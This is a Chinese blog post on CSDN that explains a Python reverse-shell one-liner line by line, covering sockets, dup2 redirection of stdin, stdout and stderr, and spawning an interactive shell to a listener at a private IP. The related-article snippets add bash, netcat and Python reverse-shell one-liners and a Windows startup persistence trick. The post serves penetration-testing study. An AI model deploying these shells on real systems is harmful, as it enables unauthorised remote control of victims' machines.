Python 反向 Shell 代码分析

最新推荐文章于 2024-02-08 22:44:52 发布
最新推荐文章于 2024-02-08 22:44:52 发布
阅读量1k 收藏 3
点赞数 1
文章标签: 渗透测试 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46104215/article/details/121579374
版权 
import os,socket,subprocess;
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.110.130',2222))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])

(1)在任何类型的通信开始之前,网络应用程序都必须创建套接字

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

socket:创建套接字,socket.AF_INET代表使用IPv4协议,socket.SOCK_STREAM 代表使用面向流的Tcp协议(TCP套接字的名字SOCK_STREAM),作用于通信

(2)网络中 ip 地址和 port 端口定义唯一的一个进程,实现不同主机之间的通信

s.connect(('192.168.110.130',2222))

(3)作用:重定向

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)

dup2(fd1, fd2) :传入两个文件描述符,fd1和fd2(fd1是必须存在的),如果fd2存在,就关闭fd2,然后将fd1代表的那个文件(可以想象成是P_fd1指针)强行复制给fd2,fd2这个文件描述符不会发生变化,但是fd2指向的文件就变成了fd1指向的文件。

fileno() :返回一个整型的文件描述符(file descriptor FD 整型)

注意:文件描述符是 Linux 中独有的,在 Linux 中,一切皆是文件

在linux中系统对于文件的操作是根据文件描述符来决定的,文件描述符是一个比较小的大于等于3的整数,0表示标准输入stdin,1表示标准输出stdout,2表示标准错误输出stderr

说明:当一个应用程序刚刚启动的时候,0是标准输入,1是标准输出,2是标准错误。如果此时去打开一个新的文件,它的文件描述符会是3。POSIX标准要求每次打开文件时(含socket)必须使用当前进程中最小可用的文件描述符号

因此以上命令代表:将socket传回的数据 替换 stdin,stdout,stderr 原本内容(在 攻击机 监听端口时会自动创建一个套接字)。

我的想法是这样:

  • 标准输入:来自于 攻击机 传输的内容
  • 标准输出、标准错误:来自于 目标机 输出的内容。由于 目标机与攻击机 之间的连接,通信,目标机输出内容会被传到 攻击机 显示

(4)subprocess库:允许生成新的进程,连接到它们的 input/output/error 管道,并获取它们的返回(状态)码

p=subprocess.call(['/bin/sh','-i'])

call():执行指定的命令,返回命令执行的状态码

//bash是shell的一种,是linux下最常用的一种shell;传入参数“-i”,使bash以交互模式启动

综合上面,shell 被调用,执行 攻击机 输入的内容,相当于 攻击机 控制了目标机

参考文献:

Python3实现反向Shell_Pad0y的博客-CSDN博客(脚本学习,感觉蛮有用,中间的原理清晰)

简单理解socket(socket.AF_INET,socket.SOCK_STRE,os.dup2(s.fileno(),0),subprocess.call([“/bin/bash“,“-i“])_liver100day的博客-CSDN博客

记一次对python反弹shell的分析 - HF9 - 博客园

一、Socket技术详解 - 简书(写得很详细,重新复习)

橙汁水
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python3实现反向Shell
Pad0y的博客
09-28 2091
很多有名的远程控制工具都是基于C/S结构开发的,比如:灰鸽子、冰河、teamViewer等等。通常情况下是将Client作为控制端,Server作为被控端。这里笔者将采用反向连接的方式,将Server作为控制端,Client作为被控端。当然,这两种方式都可以实现功能。这里我采用反向连接的方式主要是考虑到肉鸡在内网中,我们是无法直接连接到被控端的。如果用反向连接的方式,尽管被控端在内网中,只要我们不在内网中,或者我们做了内网端口映射、动态域
Python3 实现可控制肉鸡的反向Shell
git1314的博客
09-29 842
Python3 实现可控制肉鸡的反向Shell 一、初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为Client主动连接到我们的Server端,以实现对多个远程主机的管理! 学习技能: 了解TCP协议 了解C/S结构程序设计 Python socket模块的使用 Python subprocess模块的...
Python实现反向Shell
最新发布
xingxsc的博客
02-08 469
反向Shell的实现也是可以通过python来实现,接下来会用到socket, subprocess来写。
Python Security 之 反向Shell
不急不躁
07-14 1239
首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。 我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTP
python 反向shell 编程
悦信安In4sec
03-14 490
服务端(监听端): 建立套接字编程 绑定端口 监听 连接到后门 发送信息(例如命令whoami之类的) 接收到后门返回的信息后门(客服端): 建立套接字 连接服务器 接收服务器返回的信息 处理后返回给服务器程序: 服务端(监听端):#!/usr/bin/python import socket s = socket.socket(socket.AF_INET,socket.SO
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 ...
Reverse-Shell-with-autorun:在python上实现的反向shell,包括服务器,客户端和自动运行代码。 从服务器在后台控制客户端PC命令行
04-13
**Python反向Shell详解** Python是一种功能强大的编程语言,它在网络安全领域中有着广泛的应用,尤其是在渗透测试和安全审计中。其中一个重要的应用就是构建反向Shell反向Shell允许攻击者通过网络远程控制目标...
shp:Shell Please 1.0:反向shell代码生成器
03-03
Shell请为8种以上类型生成反向Shell代码,例如php,bash,nc,python,golang等。 您始终可以执行一个命令并访问许多shell代码,现在您只需复制代码即可获得该死的反向shell! 如何安装? 将以下命令复制粘贴到您...
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
revshellgen:用Python 3编写的反向shell生成器
02-05
Python 3编写的独立脚本,无需键入即可轻松生成反向shell。 它可以自动完成一些无聊的工作,例如URL编码命令和设置侦听器。 下载 git clone https://github.com/t0thkr1s/revshellgen 安装 该脚本有4个依赖项: ...
python反弹shell(linux)
秋水的博客
10-02 3087
第一种代码如下 标准输入 (stdin) :代码为 0 ,使用 < 或 << 标准输出 (stdout):代码为 1 ,使用 > 或 >> 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>> import socket,subprocess,os s=socket.socket(socket.AF_...
Python-基于socket实现的反向shell攻击后门
Vimor的博客
09-09 4976
下面给出一个基于socket实现的反向shell攻击,或者叫做控制工具吧,简单点说来就是在“受害者”电脑上留一个后门,“攻击者”可以通过这个连接这个socket实现在“受害者”电脑上执行各种指令,再直白一点就是一个socket通信的实例而已。 “受害者“端(后门):backdoor.py,这里充当一个socket服务端程序,主要实现连接的的监听、数据的收发和处理以及指令的执行 #!/u
一句话反射shell
tudoutest的博客
12-28 892
通过一句话反射一个shell   首先你在自己的及其上起一个进程来监听 mypc$ nc -l -v 0.0.0.0 4444   ip就是你自己的ip 端口任意(我这里写的是4444) 注意这个端口不要被自己的防火墙过滤掉 比如ubuntu上可以用 ufw allow 端口号 来打开端口。   后面就是到要反射的及其上输入命令   Bash bash -i &gt;&amp;...
os.dup2(s.fileno(),0)
weixin_35753431的博客
12-20 340
os.dup2() 是 Python 中的一个系统调用,用于将一个文件描述符复制到另一个文件描述符。 具体来说,os.dup2(s.fileno(), 0) 的意思是将 s 这个文件对象的文件描述符复制到标准输入的文件描述符 0 上。这样做的效果是将标准输入重定向到 s 这个文件上,之后所有的输入操作都会从 s 中读取数据。 例如,假设我们有一个文件 test.txt,内容如下: Hello, W...
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5678
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
windows 系统怎么让自己编写的 bat 文件开机自动启动
zahirah11的博客
09-14 1171
新建一个 vbs 文件 例:新建一个 demo.vbs 文件 内容如下:其中需要修改你的 bat 文件路径 set ws=WScript.CreateObject("WScript.Shell") ws.Run "D:\a.bat /start",0 然后将该 vbs 文件移动到下方文件夹内即可 C:\Users\27392\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup ...
获取flag值
热门推荐
qq_49091880的博客
01-02 1万+
获取FLAG值 一、SSH服务器 1.如何从外部进入最终root主机,获得flag值 SSH:建立在应用层基础上的协议 SSH是目前较可靠,专门远程登录会话和其他网络服务提供安全性的 协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题 2.SSH基于TCP 22端口的服务 3.SSH协议认证机制 (1)基于口令的安全验证 (2)基于密钥的安全验证 注:id_rsa:私钥 id_rsa.pub:公钥 二、实验环境 1.攻击机:192.168.1.105 2.靶机机器:192.168.1.106
内网渗透-常用反弹shell方法总结
lza20001103的博客
08-28 4682
常用反弹shell方法总结 文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt
python反弹shell
weixin_42576467的博客
01-07 692
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值